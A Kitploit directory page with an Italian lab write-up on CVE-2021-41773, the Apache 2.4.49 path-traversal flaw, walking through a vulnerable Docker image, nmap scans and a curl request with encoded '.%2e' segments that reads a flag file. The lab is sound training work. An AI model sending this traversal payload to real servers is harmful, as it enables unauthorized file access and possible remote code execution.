Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41773-exercise — 动手实验:利用 Docker、Nmap 扫描和 curl 来利用 Apache 2.4.49 路径遍历漏洞(CVE-2021-41773)并获取 flag。 | Kitploit
工具/GitHubGitHub/m96dg/cve-2021-41773-exercise
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubm96dg/cve-2021-41773-exercise

CVE-2021-41773-exercise

动手实验:利用 Docker、Nmap 扫描和 curl 来利用 Apache 2.4.49 路径遍历漏洞(CVE-2021-41773)并获取 flag。

查看仓库
44年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41773-exercise

È stata trovata una falla in una modifica apportata alla normalizzazione dei percorsi in Apache HTTP Server 2.4.49. Un attaccante potrebbe utilizzare un attacco di path traversal per mappare gli URL a file al di fuori delle directory configurate da direttive simili ad Alias. Se i file al di fuori di queste directory non sono protetti dalla consueta configurazione predefinita "require all denied", queste richieste possono avere successo. Se gli script CGI sono anche abilitati per questi percorsi alias, ciò potrebbe consentire l'esecuzione remota di codice. Questo problema riguarda solo Apache 2.4.49 e non le versioni precedenti.

Crediti introduttivi a: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

L'obiettivo dell'esercitazione è sfruttare la vulnerabilità presente in Apache 2.4.49. Per poterla sfruttare è necessario utilizzare un "path traversal attack" per mappare i file al di fuori delle cartelle preconfigurate e creare una sorta di shell remota.

Per l'esercitazione è comodo utilizzare un docker vulnerabile ad hoc presente su docker hub:

Link: https://hub.docker.com/r/m96dg/pw_apache_2_4_49

$docker pull m96dg/pw_apache_2_4_49

1_docker_pull

Per poter vedere le immagini dei docker pullate:

$docker images

Eseguire il docker sulla porta 8080:

$docker run -dit -p 8080:80 m96dg/pw_apache_2_4_49

Per poter verificare che sia effettivamente in esecuzione:

$docker ps

2_docker_run

Come si vede il web server è perfettamente funzionante:

3_8080

Fase di scansione (cerchiamo di raccogliere quante più informazioni possibili dall'host):

$nmap -sS -p- -T4 -Pn -oA portScan localhost

4_portScan

Fase di enumerazione (cerchiamo di approfondire le informazioni andando ad enumerare le porte trovate in fase di scansione):

$nmap -sV -sC -oA versionScan localhost

5_versionScan

Per poter effettuare l'attacco, è necessario lanciare questo comando e provare a trovare la flag (qualora sia inserita in root):

$curl http://[IP]:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/flag.txt

6_exploit

Per avere certezza che l'esercitazione sia andata a buon fine, e che la flag sia effettivamente quella trovata, confrontare la stringa con la sua decriptazione in Md5 ("HaiTrovatoLaFlag_Apache"). Se le due stringhe combaciano, allora il gioco è fatto!

下载工具